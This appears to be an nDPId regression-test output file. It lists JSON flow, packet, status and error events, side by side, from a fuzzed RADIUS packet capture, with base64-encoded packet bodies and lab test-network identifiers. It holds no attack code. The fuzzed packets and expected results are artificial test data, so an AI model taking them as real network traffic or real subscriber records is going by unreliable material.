00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1528998585268,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998585268,"pkt":"AAAMB6xAABRP+4rqCABFAALHIWdAAP8RAAAKDEAexuIZNXIQBxQCswAAAbkCqwwIsTK62hmv9RZW9\/f12AIaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq5ATUwMzExNDgwMjUwODY0NjKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1528998585268,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998585268,"pkt":"AAAMB6xAABRP+4rqCABFAALHIWdAAP8RAAAKDEAexuIZNXIQBxQCswAAAbkCqwwIsTK62hmv9RZW9\/f12AIaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq5ATUwMzExNDgwMjUwODY0NjKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00725{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998585268,"pkt":"ABRP+4rqcNuYVcUnCABFADUwD91AAPwRQ57G4hk1CgxAHgcUchABHJkzArkBFPuMuhZj3jbkVosdPxLeAO4aCwAAV8gbBVNQQxpuAAABNxA0w9JZoXWsZGeHUoYiJ9p40yJPEfSCC1VPuzQcz\/tcT9Zniiv93vAfl8Sqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998585268,"pkt":"ABRP+4rqcNuYVcUnCABFADUwD91AAPwRQ57G4hk1CgxAHgcUchABHJkzArkBFPuMuhZj3jbkVosdPxLeAO4aCwAAV8gbBVNQQxpuAAABNxA0w9JZoXWsZGeHUoYiJ9p40yJPEfSCC1VPuzQcz\/tcT9Zniiv93vAfl8Sqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998585453} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998585453}
00497{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":349,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":349,"packets-processed":283,"total-skipped-flows":0,"total-l4-data-len":122535,"total-not-detected-flows":16,"total-guessed-flows":3,"total-detected-flows":55,"total-detection-updates":0,"total-updates":13,"current-active-flows":5,"total-active-flows":76,"total-idle-flows":71,"total-events-serialized":460,"global_ts_msec":1528998601376} 00497{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":349,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":349,"packets-processed":283,"total-skipped-flows":0,"total-l4-data-len":122535,"total-not-detected-flows":16,"total-guessed-flows":3,"total-detected-flows":55,"total-detection-updates":0,"total-updates":13,"current-active-flows":5,"total-active-flows":76,"total-idle-flows":71,"total-events-serialized":460,"global_ts_msec":1528998601376}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1528998605741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"thread_ts_msec":1528998605741,"pkt":"AAAMB6xAABRP+4rqCABFAAKRIWpAAP8RAAAKDEAexuIZNXIQBxUCfQAABLwCddn+cEnhcqnQe5pr1rrJmHQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODgwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIsIDViMjJhYWM5L2YwOjc5OjYwOmQxOjdkOjM3LzI0NDEGAAAAExoxAAAACQErYXVkaXQtc2Vzc2lvbi1pZD0xMGZmMTBhWTAwMPowMGQ1YzlhYTIyNWItBgAAAAFABgAAAA1BBl4AAAZRBDU2NwZbIqrNGhQAAFfIBw5WWldDMlRlc3RMYWIaCgAAV8gIBEVUGhAAAFfICgpTdGFuZGFyZBoQAABXyAsKVGVzdCBMYWIaCQAAV8gPAzEaCgAAV8gQBE5KGhEAAFfIEQtMeW5kaHVyc3QaDAAAV8gSBgAAAMkaFwAAV8gdEVZaVyBDMiBUZXN0IExhYhoLAABXyCUFVnpXGg2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1528998605741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"thread_ts_msec":1528998605741,"pkt":"AAAMB6xAABRP+4rqCABFAAKRIWpAAP8RAAAKDEAexuIZNXIQBxUCfQAABLwCddn+cEnhcqnQe5pr1rrJmHQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODgwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIsIDViMjJhYWM5L2YwOjc5OjYwOmQxOjdkOjM3LzI0NDEGAAAAExoxAAAACQErYXVkaXQtc2Vzc2lvbi1pZD0xMGZmMTBhWTAwMPowMGQ1YzlhYTIyNWItBgAAAAFABgAAAA1BBl4AAAZRBDU2NwZbIqrNGhQAAFfIBw5WWldDMlRlc3RMYWIaCgAAV8gIBEVUGhAAAFfICgpTdGFuZGFyZBoQAABXyAsKVGVzdCBMYWIaCQAAV8gPAzEaCgAAV8gQBE5KGhEAAFfIEQtMeW5kaHVyc3QaDAAAV8gSBgAAAMkaFwAAV8gdEVZaVyBDMiBUZXN0IExhYhoLAABXyCUFVnpXGg2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
@@ -466,10 +466,10 @@
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":600000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998636010,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":600000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998636010,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1528998636010,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998636010,"pkt":"ABRP+4rqcNuYVcUnCABFAAClEJJAAPslAHTG4hk1CgxAHgcUchAAkT3yC70AiXLX5bK1bcbjOxq4bylP028BNTAzMTE0ODAyMxg1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZyxiNWIyMmFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1Tw4BAAAMFwwAAAxRf\/xQEvTT2\/+5xTPwYXYdoAWLt9A="} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1528998636010,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998636010,"pkt":"ABRP+4rqcNuYVcUnCABFAAClEJJAAPslAHTG4hk1CgxAHgcUchAAkT3yC70AiXLX5bK1bcbjOxq4bylP028BNTAzMTE0ODAyMxg1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZyxiNWIyMmFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1Tw4BAAAMFwwAAAxRf\/xQEvTT2\/+5xTPwYXYdoAWLt9A="}
01232{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2064,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998636010,"pkt":"AAAMB6xAABRP+4rqCBBFAAKrIWxAAP8RAAAKDEAexuIZNXIQBxQClwAAAb4Cj8yIFnOZ6cZavy+ov11X2XMaCgAAV8gOBKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01218{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2064,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998636010,"pkt":"AAAMB6xAABRP+4rqCBBFAAKrIWxAAP8RAAAKDEAexuIZNXIQBxQClwAAAb4Cj8yIFnOZ6cZavy+ov11X2XMaCgAAV8gOBKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2064,"global_ts_msec":1528998636143} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2064,"global_ts_msec":1528998636143}
01233{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":22528,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998639447,"pkt":"AAAMB6xAABRP+4rqWABFAAKrIW5AAP8RAAAKCEAexuIZNXIQBxQClwAAAcACj3BXfw4b3GMlZswG9bQoL7gaCgAAV8gOBFVTGgwAAFfIDQZXaWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqrvATUwMzExNDgwMjMyNTY4NjMxQHdsYW4ubW5jNDkwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLXAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJESthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDZlYmFhMjI1YiwgNWIybWFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2T2cCAAAIbQwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhdWAFfIHRFWWlcgQzIgVGVzdDdMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERcAAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASZHVbxXaB7Y4HBclkU5O1hA=="} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":22528,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998639447,"pkt":"AAAMB6xAABRP+4rqWABFAAKrIW5AAP8RAAAKCEAexuIZNXIQBxQClwAAAcACj3BXfw4b3GMlZswG9bQoL7gaCgAAV8gOBFVTGgwAAFfIDQZXaWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqrvATUwMzExNDgwMjMyNTY4NjMxQHdsYW4ubW5jNDkwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLXAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJESthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDZlYmFhMjI1YiwgNWIybWFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2T2cCAAAIbQwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhdWAFfIHRFWWlcgQzIgVGVzdDdMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERcAAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASZHVbxXaB7Y4HBclkU5O1hA=="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":22528,"global_ts_msec":1528998639586} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":22528,"global_ts_msec":1528998639586}
